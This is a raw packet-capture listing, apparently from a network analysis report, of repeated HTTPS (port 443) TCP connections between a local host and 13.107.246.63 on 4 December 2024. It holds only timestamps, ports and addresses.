                                                                                                                                                                                  Dec 4, 2024 11:10:14.286295891 CET49779443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:14.286310911 CET4434977913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.362682104 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.363233089 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:14.363256931 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.363725901 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:14.363730907 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.403300047 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.403758049 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:14.403784037 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.404222012 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:14.404227972 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.576862097 CET4434977813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.577480078 CET49778443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:14.577508926 CET4434977813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.578315973 CET49778443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:14.578320980 CET4434977813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.807679892 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.807743073 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.807796001 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:14.807940960 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:14.807960987 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.807971954 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:14.807977915 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.810420990 CET49780443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:14.810465097 CET4434978013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.810549021 CET49780443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:14.810689926 CET49780443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:14.810698986 CET4434978013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.847664118 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.847721100 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.847784996 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:14.848144054 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:14.848160982 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.848174095 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:14.848179102 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.850677967 CET49781443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:14.850719929 CET4434978113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.850781918 CET49781443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:14.850917101 CET49781443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:14.850928068 CET4434978113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:15.022356033 CET4434977813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:15.022420883 CET4434977813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:15.022483110 CET49778443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:15.022684097 CET49778443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:15.022700071 CET4434977813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:15.022710085 CET49778443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:15.022716045 CET4434977813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:15.025712967 CET49782443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:15.025748968 CET4434978213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:15.025834084 CET49782443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:15.026006937 CET49782443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:15.026019096 CET4434978213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:15.114331961 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:15.114892960 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:15.114911079 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:15.115345001 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:15.115349054 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:15.558485031 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:15.558551073 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:15.558614969 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:15.558844090 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:15.558865070 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:15.558876038 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:15.558881998 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:15.561983109 CET49783443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:15.562036991 CET4434978313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:15.562134981 CET49783443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:15.562304020 CET49783443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:15.562319040 CET4434978313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:16.068211079 CET4434977913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:16.068732023 CET49779443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:16.068761110 CET4434977913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:16.069221973 CET49779443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:16.069226027 CET4434977913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:16.513423920 CET4434977913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:16.513478041 CET4434977913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:16.513523102 CET49779443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:16.513773918 CET49779443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:16.513791084 CET4434977913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:16.513801098 CET49779443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:16.513806105 CET4434977913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:16.520704031 CET49784443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:16.520739079 CET4434978413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:16.520821095 CET49784443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:16.521075964 CET49784443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:16.521090031 CET4434978413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:16.568142891 CET4434978113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:16.568615913 CET49781443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:16.568636894 CET4434978113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:16.569263935 CET49781443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:16.569268942 CET4434978113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:16.597598076 CET4434978013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:16.598448992 CET49780443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:16.598478079 CET4434978013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:16.598896027 CET49780443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:16.598902941 CET4434978013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:16.838043928 CET4434978213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:16.838730097 CET49782443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:16.838753939 CET4434978213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:16.839169025 CET49782443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:16.839174032 CET4434978213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.002646923 CET4434978113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.002702951 CET4434978113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.002758026 CET49781443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.002938032 CET49781443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.002958059 CET4434978113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.002969980 CET49781443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.002976894 CET4434978113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.005742073 CET49785443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.005778074 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.005887032 CET49785443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.005990982 CET49785443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.006001949 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.041588068 CET4434978013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.041632891 CET4434978013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.041686058 CET49780443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.041800976 CET49780443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.041814089 CET4434978013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.041841030 CET49780443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.041846037 CET4434978013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.043803930 CET49786443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.043833971 CET4434978613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.043904066 CET49786443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.044019938 CET49786443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.044028997 CET4434978613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.283052921 CET4434978213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.283114910 CET4434978213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.283168077 CET49782443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.283340931 CET49782443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.283351898 CET4434978213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.283365011 CET49782443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.283370018 CET4434978213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.286130905 CET49787443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.286160946 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.286221981 CET49787443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.286353111 CET49787443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.286361933 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.375258923 CET4434978313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.375739098 CET49783443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.375763893 CET4434978313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.376210928 CET49783443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.376216888 CET4434978313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.820918083 CET4434978313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.820991039 CET4434978313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.821043015 CET49783443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.821218967 CET49783443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.821234941 CET4434978313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.821244001 CET49783443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.821249008 CET4434978313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.823733091 CET49788443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.823765039 CET4434978813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:17.823832035 CET49788443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.823962927 CET49788443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:17.823972940 CET4434978813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:18.300060987 CET4434978413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:18.300524950 CET49784443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:18.300543070 CET4434978413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:18.301065922 CET49784443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:18.301069975 CET4434978413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:18.744904995 CET4434978413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:18.744976044 CET4434978413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:18.745038033 CET49784443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:18.745254993 CET49784443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:18.745268106 CET4434978413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:18.745286942 CET49784443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:18.745292902 CET4434978413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:18.748229027 CET49789443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:18.748271942 CET4434978913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:18.748352051 CET49789443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:18.748543978 CET49789443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:18.748553991 CET4434978913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:18.784943104 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:18.785566092 CET49785443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:18.785582066 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:18.785996914 CET49785443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:18.786001921 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:18.833672047 CET4434978613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:18.833973885 CET49786443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:18.833981991 CET4434978613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:18.834355116 CET49786443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:18.834358931 CET4434978613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:19.068110943 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:19.068651915 CET49787443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:19.068679094 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:19.069092035 CET49787443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:19.069097042 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:19.229480982 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:19.229542017 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:19.229593992 CET49785443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:19.229789019 CET49785443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:19.229810953 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:19.229821920 CET49785443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:19.229826927 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:19.232714891 CET49790443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:19.232757092 CET4434979013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:19.232835054 CET49790443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:19.233009100 CET49790443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:19.233017921 CET4434979013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:19.280303001 CET4434978613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:19.280391932 CET4434978613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:19.280435085 CET49786443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:19.280558109 CET49786443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:19.280569077 CET4434978613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:19.280580044 CET49786443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:19.280585051 CET4434978613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:19.283046961 CET49791443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:19.283077955 CET4434979113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:19.283153057 CET49791443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:19.283289909 CET49791443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:19.283299923 CET4434979113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:19.513056993 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:19.513132095 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:19.513221979 CET49787443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:19.513434887 CET49787443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:19.513449907 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:19.513461113 CET49787443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:19.513464928 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:19.516211987 CET49792443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:19.516222000 CET4434979213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:19.516285896 CET49792443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:19.516434908 CET49792443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:19.516458988 CET4434979213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:19.608091116 CET4434978813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:19.608566999 CET49788443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:19.608592033 CET4434978813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:19.609097958 CET49788443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:19.609102011 CET4434978813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:20.053720951 CET4434978813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:20.053777933 CET4434978813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:20.053841114 CET49788443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:20.054019928 CET49788443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:20.054033995 CET4434978813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:20.054048061 CET49788443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:20.054054022 CET4434978813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:20.056504011 CET49793443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:20.056545973 CET4434979313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:20.056612968 CET49793443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:20.056730032 CET49793443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:20.056741953 CET4434979313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:20.531934023 CET4434978913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:20.532413960 CET49789443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:20.532438993 CET4434978913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:20.533149958 CET49789443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:20.533160925 CET4434978913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:20.976901054 CET4434978913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:20.976969004 CET4434978913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:20.977013111 CET49789443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:20.977247000 CET49789443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:20.977262974 CET4434978913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:20.977274895 CET49789443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:20.977281094 CET4434978913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:20.980757952 CET49794443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:20.980797052 CET4434979413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:20.980855942 CET49794443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:20.981183052 CET49794443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:20.981197119 CET4434979413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:21.002521038 CET4434979113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:21.002890110 CET49791443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:21.002907038 CET4434979113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:21.003406048 CET49791443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:21.003412008 CET4434979113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:21.012132883 CET4434979013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:21.012481928 CET49790443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:21.012512922 CET4434979013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:21.012953997 CET49790443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:21.012959003 CET4434979013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:21.439037085 CET4434979113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:21.439096928 CET4434979113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:21.439182043 CET49791443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:21.439397097 CET49791443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:21.439419031 CET4434979113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:21.439429998 CET49791443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:21.439435959 CET4434979113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:21.442414045 CET49795443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:21.442466974 CET4434979513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:21.444118023 CET49795443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:21.444281101 CET49795443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:21.444297075 CET4434979513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:21.456470013 CET4434979013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:21.456527948 CET4434979013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:21.456630945 CET49790443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:21.456830025 CET49790443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:21.456851006 CET4434979013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:21.456861973 CET49790443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:21.456867933 CET4434979013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:21.467025042 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:21.467050076 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:21.467144012 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:21.467408895 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:21.467422009 CET4434979613.107.246.63192.168.2.4
